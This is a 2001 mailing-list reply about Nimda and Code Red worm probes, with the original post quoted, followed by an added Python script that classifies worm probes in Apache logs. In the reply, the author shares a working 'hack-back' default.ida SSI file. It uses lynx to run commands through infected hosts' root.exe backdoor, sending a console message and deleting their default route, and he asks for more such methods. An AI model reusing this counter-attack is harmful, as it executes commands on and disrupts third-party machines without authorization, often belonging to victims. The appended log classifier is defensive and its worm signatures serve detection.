Hi Asgard.
I don't think you'll have any luck collecting the $1 per attack. My
approach is simpler, though likely to raise eyebrows. Input from
lawyers would be especially welcome. ;)
My assumptions are:
- any host which is attacking me has vulnerabilities which should have
been patched months ago, and
- any unpatched server is being run by administrators or companies who
don't care enough about system uptime to implement proper security.
I've created a default.ida file in my web root, and added lines to
Apache's httpd.conf to turn .ida files into SSI. My default.ida is:
<p>This host is immune to Code Red. Upgrade to a real operating system.</p>
<!--#exec cmd="/usr/local/bin/lynx -dump
http://$REMOTE_HOST/scripts/root.exe\?/c+net+send+localhost+%22Your+webserver+has+been+infected+with+the+CodeRed2+worm.+You+should+fix+it+before+script+kiddie+comes+along+and+take+advantage+of+it+again.+Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+\(or+wherever+your+CGI+scripts+live\),+and+install+a+bloody+virus+scanner.%22"
-->
<!--#exec cmd="/usr/local/bin/lynx -dump
http://$REMOTE_HOST/scripts/root.exe\?/c+route+delete+0.0.0.0" -->
If all goes as planned, the effect is to put a message on the console,
and remove the default route on the host thereby protecting the Internet
and forcing someone to look at the console.
Note that this *only* catches machines which have been infected with
CodeRed2, which leaves a leftover /scripts/root.exe to play with.
If someone wants to tell me how to do this with some of the other
vulnerabilities that Nimda tries to use, I'd be grateful. :)
p
On Sat, Sep 22, 2001 at 10:42:07PM +0200, Asgard Hostmaster wrote:
>
> Hi,
>
> Thought I'd post this here as this group seems to be one of the most
> eclectic and knowledgeable around. We're all aware of the current NIMDA
> worm attacks. I recently modified my IIS 404 error page to do a netblock
> lookup on the IP of the server trying to attack ours and then email the
> netblock owner and store the information in a database. Since doing that
> a little over 24hrs ago we've received 84807 attacks from 101 separate
> servers.
>
> Considering this worm uses exploits that got massive publicity with Code
> Red, I'm wondering about liability of companies that continue to run
> vulnerable servers? I'm seriously considering automatically reviewing
> all ip addresses 24hrs after they've first attacked and if I'm
> still being attacked giving them a further 6 or 12 hours and then I'll
> charge them $1/attack until it stops. For god's sake it's a 15 min job
> at most to actually stop the virus, though longer to fully check and
> clear the server. Perhaps this sort of action might convince some people
> to finally take server patching seriously? Thoughts folks? Any lawyers
> on the list interested in taking it up? :-)
>
> Cheers,
> david
--
Paul Chvostek <[EMAIL PROTECTED]>
Operations / Development / Abuse / Whatever vox: +1 416 598-0000
IT Canada http://www.it.ca/
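A defender-side companion to the thread above, added here and not part of Paul's or David's posts: it classifies Code Red / Nimda probes in Apache access-log lines, counts them per source host, and lists the hosts still probing after the 24-hour grace period the thread discusses. The default.ida and root.exe paths are the ones named in the thread; the cmd.exe variant comes from the public Nimda descriptions, and the log lines and addresses are constructed samples.

```python
import re
from datetime import datetime, timedelta

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+)[^"]*" \d{3}')

# (label, pattern over the request path); the first match wins.
SIGNATURES = [
    ("CodeRed/default.ida", re.compile(r"^/default\.ida\?", re.I)),
    ("Nimda/root.exe", re.compile(r"/(scripts|msadc)/root\.exe\?/c\+", re.I)),
    ("Nimda/cmd.exe", re.compile(r"/cmd\.exe\?/c\+", re.I)),
]

def classify(path):
    # Worm signature label for a request path, or None if it looks benign.
    return next((label for label, rx in SIGNATURES if rx.search(path)), None)

def parse_line(line):
    # (ip, timestamp, path) for a parsable Apache common/combined log line, else None.
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("path")

def summarize(lines):
    # Per source IP: probe count, first/last seen and the signatures matched.
    hosts = {}
    for line in lines:
        parsed = parse_line(line)
        label = classify(parsed[2]) if parsed else None
        if label is None:
            continue  # unparsable line or an ordinary request
        ip, ts, _ = parsed
        h = hosts.setdefault(ip, {"count": 0, "first": ts, "last": ts, "labels": set()})
        h["count"] += 1
        h["first"], h["last"] = min(h["first"], ts), max(h["last"], ts)
        h["labels"].add(label)
    return hosts

def persistent_hosts(hosts, hours=24):
    # IPs still probing `hours` or more after their first probe (the thread's grace period).
    return sorted(ip for ip, h in hosts.items() if h["last"] - h["first"] >= timedelta(hours=hours))

# Constructed sample lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Sep/2001:10:00:01 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 296',
    '192.0.2.10 - - [22/Sep/2001:11:30:00 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289',
    '198.51.100.7 - - [22/Sep/2001:12:00:00 +0200] "GET /default.ida?NNNNNNNNNNNNNNNN HTTP/1.0" 404 291',
    '203.0.113.5 - - [22/Sep/2001:12:05:00 +0200] "GET /index.html HTTP/1.0" 200 1532',
]
```

Feeding a real access_log through summarize() gives the per-host table David describes building from his 404 handler, without executing anything against the probing host.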